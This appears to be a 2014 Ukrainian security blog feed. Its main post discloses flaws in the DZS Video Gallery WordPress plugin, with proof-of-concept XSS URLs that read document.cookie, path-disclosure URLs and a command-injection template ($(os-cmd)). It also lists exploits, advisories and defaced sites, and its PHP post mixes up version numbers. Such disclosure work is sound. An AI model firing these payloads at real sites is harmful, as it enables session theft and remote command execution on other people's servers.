Websecurity - Веб безпека

08.05.2014

У квітні, 24.04.2014, я виявив Cross-Site Scripting, Full path disclosure та OS Commanding уразливості в плагіні DZS Video Gallery для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Js-Multi-Hotel для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

12.07.2014

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dzs-videogallery/videogallery.php
http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php

Уразливості в php-скриптах або в error_log у всіх папках плагіна. Різні файли в різних версіях плагіна.

OS Commanding (WASC-31):

http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)

RCE використовуючи метод Pichaya Morimoto.

Вразливі все версії DZS Video Gallery для WordPress.

Продовжуючи розпочату традицію, після попереднього відео про виконання коду в Mozilla Firefox, пропоную нове відео на веб секюріті тематику. Цього разу відео про виконання коду в Adobe Flash. Рекомендую подивитися всім хто цікавиться цією темою.

metasploit adobe flash filters type confusion (cve-2013-5331)

В даному відео ролику демонструється використання експлоіта для проведення атаки на уразливість в Adobe Flash Player 11.9.900.152. Ця уразливість призводить до віддаленого виконання коду в браузері з Flash плагіном (показано на прикладі Internet Explorer під Windows 7) при відкритті сторінки з кодом експлоіту. Що дозволяє нападнику отримати контроль над атакованим комп’ютером.

Атака відбувається при відвідуванні в браузері з флеш плагіном спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на веб браузери.

Виявлена можливість підвищення привілеїв в IBM DB2.

Уразливі версії: IBM DB2 9.5, DB2 9.7, DB2 9.8, DB2 10.1, DB2 10.5.

Небезпечне завантаження динамічних бібліотек.

• SetUID/SetGID Programs Allow Privilege Escalation Via Insecure RPATH In IBM DB2 (деталі)

Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки.

Добірка цікавого чтива на тему безпеки, зокрема про DoS і DDoS атаки (статті з Вікіпедії):

• Denial of Service та Distributed Denial of Service
• Application layer DDoS attack
• Billion laughs (XML bomb, Exponential Entity Expansion attack)
• Broadcast radiation
• Distributed denial of service attacks on root nameservers

Виявлені численні уразливості безпеки в продуктах Oracle, Sun, MySQL і PeopleSoft.

Уразливі продукти: Oracle 11g, Oracle 12c, MySQL 5.5 і 5.6, Oracle Java SE 5, 6, 7 і 8, OpenJDK 7, Solaris 11.1, WebLogic Server 12.1, E-Business Suite 12i, JRockit 28.2, WebCenter Portal 11.1 та інші продукти Oracle.

104 уразливості у різних додатках виправлено в щоквартальному оновленні.

• Oracle Critical Patch Update Advisory - April 2014 (деталі)

В даній добірці експлоіти в веб додатках:

• SMART iPBX SQL Injection Vulnerability (деталі)
• Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities (деталі)
• D-Link Cross Site Scripting / Information Disclosure Vulnerability (деталі)
• Sophos Web Protection Appliance Command Execution Exploit (деталі)
• eScan Web Management Console Command Injection Exploit (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.nspp.gov.ua (хакерами з ToP-TeaM) - 23.03.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.grad.gov.ua (хакером Phantomghost) - 01.06.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://shpola.ck.ua (хакером Anonsec) - 13.03.2014, зараз сайт вже виправлений адмінами
• http://shpola1school.org.ua (хакером mustireiSc) - 13.03.2014, зараз сайт вже виправлений адмінами
• http://hlebzavod.org (хакером d3b~X) - 16.03.2014, зараз сайт вже виправлений адмінами

Розповім про ефективність роботи про блокуванню рахунків терористів.

З початку червня я займаюся блокуванням рахунків терористів в електронних платіжних системах. Зокрема в системах WebMoney, Яндекс.Деньги, QIWI і PayPal.

В цьому місяці я неодноразово читав про заяви ДНР, ЛНР та їх прихильників про блокування рахунків. Як написали на початку липня терористи в себе на сайті, в них було заблоковано 295000 рублів на рахунках PayPal і Яндекс.Деньги.

Так що окрім рахунків терористів де зовсім не було або було мало коштів, також трапляються рахунки заповнені коштами. І з кожним днем блокується все більше коштів терористів. Так що робота по блокуванню рахунків в електронних платіжних системах є ефективною і вона буде тривати й надалі.

У червні, 26 і 27.06.2014, вийшли PHP 5.5.30 і PHP 5.4.14 відповідно. У версії 5.5.30 виправлено біля 20 багів і 8 уразливостей, а у версії 5.4.14 виправлено декілька багів і 8 уразливостей. Дані релізи направлені на покращення безпеки та стабільності гілок 5.4.x і 5.5.x.

У PHP 5.4.30 і PHP 5.5.14 виправлено:

• Уразливості CVE-2014-3981, CVE-2014-0207, CVE-2014-3478, CVE-2014-3479, CVE-2014-3480, CVE-2014-3487, CVE-2014-4049, CVE-2014-3515.

По матеріалам http://www.php.net.

В даній добірці уразливості в веб додатках:

• Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities (деталі)
• Joomla! JomSocial component < 3.1.0.1 - Remote code execution (деталі)
• Security advisory, LedgerSMB 1.3.0-1.3.36 (деталі)
• Publish-It Buffer Overflow Vulnerability (деталі)
• Multiple vulnerabilities on Sitecom N300/N600 devices (деталі)